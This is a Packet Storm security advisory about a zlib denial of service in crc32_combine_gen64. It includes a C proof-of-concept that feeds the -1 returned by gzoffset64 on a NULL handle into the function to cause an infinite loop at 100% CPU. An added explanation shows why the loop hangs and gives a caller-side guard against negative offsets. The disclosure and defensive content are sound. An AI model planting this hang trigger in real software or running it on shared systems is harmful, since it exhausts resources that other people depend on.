zlib crc32_combine_gen64 Denial of Service

26 Feb 2026 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news

zlib DoS: an invalid length (-1) passed to crc32_combine_gen64 triggers an infinite loop and 100% CPU usage.

=============================================================================================================================================
    | # Title     : zlib via Infinite Loop in crc32_combine_gen64 Denial of Service                                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://github.com/madler/zlib                                                                                              |
    =============================================================================================================================================
    
    [+] Summary    :  A vulnerability in zlib (affected versions: from 0 to before 1.3.2) can lead to a Denial of Service (DoS) condition due to an infinite loop in the crc32_combine_gen64() function.
    
    The issue occurs when an invalid length value (specifically -1, interpreted as 0xFFFFFFFFFFFFFFFF in unsigned 64-bit form) is passed to the function. This can happen if a program:
    
    1. Calls gzopen() with invalid parameters.
    
    2. Fails to properly validate the returned gzFile pointer.
    
    3. Calls gzoffset64() on a NULL pointer.
    
    4. Passes the resulting invalid length to crc32_combine_gen64().
    
    When this malformed value is processed, the internal bitwise loop in crc32_combine_gen64() never terminates, and the calling thread consumes 100% CPU.
    
    This vulnerability does not allow remote code execution or privilege escalation. The impact is limited to resource exhaustion (CPU) within applications that do not properly validate zlib function return values.
    
    [+] POC   : 
    
    #include <zlib.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    void create_dummy_file(const char* filename) {
        FILE *fp = fopen(filename, "w");
        if (!fp) {
            perror("Failed to create file");
            exit(1);
        }
        fprintf(fp, "This is a test file for the vulnerability exploit");
        fclose(fp);
        printf("[+] Test file created: %s\n", filename);
    }
    
    int main(int argc, char *argv[]) {
        const char *target_file = "poc_test.gz";
        
        printf("========================================\n");
        printf("    zlib Exploit by indoushka       \n");
        printf("    DoS via Infinite Loop in crc32_combine_gen64\n");
        printf("========================================\n\n");
    
        create_dummy_file(target_file);
    
        printf("[*] Attempting to open the file incorrectly...\n");
        gzFile file = gzopen(target_file, "");
        
        if (file == NULL) {
            printf("[OK] Success: gzopen returned NULL as expected\n");
        } else {
            printf("[!] Failure: gzopen did not return NULL (unexpected)\n");
            gzclose(file);
            return 1;
        }
    
        printf("[*] Calling gzoffset64 on a NULL pointer...\n");
        z_off64_t malicious_len = gzoffset64(file);
        
        printf("[*] Value returned from gzoffset64: %lld (0x%llx)\n", 
               (long long)malicious_len, (unsigned long long)malicious_len);
        
        if (malicious_len == (z_off64_t)-1) {
            printf("[OK] Success: Obtained value -1 (0xFFFFFFFFFFFFFFFF)\n");
        }
        printf("\n[!] Calling crc32_combine_gen64 with the poisoned value...\n");
        printf("[!] This will cause the program to enter an infinite loop!\n");
        printf("[!] CPU consumption starts now... Press Ctrl+C to stop\n");
        printf("----------------------------------------\n");
      
        uLong result = crc32_combine_gen64(malicious_len);
    
        printf("CRC Result: %lu\n", result);
        gzclose(file);
        remove(target_file);
        
        return 0;
    }
    
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================
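
Why a length of -1 keeps a shift-driven loop from finishing, and the caller-side check whose absence the summary describes, as an added example (not part of the original advisory and not zlib's source). `steps_signed`, `steps_unsigned` and `checked_len` are hypothetical names, the loop is a simplified model, and an iteration cap stands in for the hang so the demo terminates.

```c
#include <stdint.h>
#include <stdio.h>

/* Simplified model (assumption, not zlib's source) of a loop that consumes
 * a signed 64-bit length one bit at a time. Returns the iteration count,
 * or -1 once `limit` is exceeded, i.e. where real code would spin forever. */
static int steps_signed(int64_t n, int limit) {
    int steps = 0;
    while (n) {
        if (++steps > limit) return -1;
        n >>= 1; /* arithmetic shift on mainstream compilers: -1 stays -1 */
    }
    return steps;
}

/* Same loop over an unsigned value: the shift zero-fills, so it always
 * finishes within 64 iterations. */
static int steps_unsigned(uint64_t n, int limit) {
    int steps = 0;
    while (n) {
        if (++steps > limit) return -1;
        n >>= 1;
    }
    return steps;
}

/* Hypothetical caller-side guard: treat a negative offset (the -1 error
 * sentinel) as a failure instead of forwarding it as a length.
 * Returns 1 and stores the length on success, 0 on rejection. */
static int checked_len(int64_t off, uint64_t *len_out) {
    if (off < 0) return 0;
    *len_out = (uint64_t)off;
    return 1;
}

int main(void) {
    uint64_t len = 0;
    printf("signed   -1 : %d\n", steps_signed(-1, 128));
    printf("unsigned max: %d\n", steps_unsigned(UINT64_MAX, 128));
    printf("guard(-1)   : %d\n", checked_len(-1, &len));
    int ok = checked_len(49, &len); /* 49 is a constructed sample offset */
    printf("guard(49)   : %d (len=%llu)\n", ok, (unsigned long long)len);
    return 0;
}
```

In a real caller the same two checks apply to the zlib calls the advisory names: test the gzopen() result for NULL, and test the gzoffset64() result for -1 before using it as a length.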

Vulners AI Score: 5.5 (Medium risk)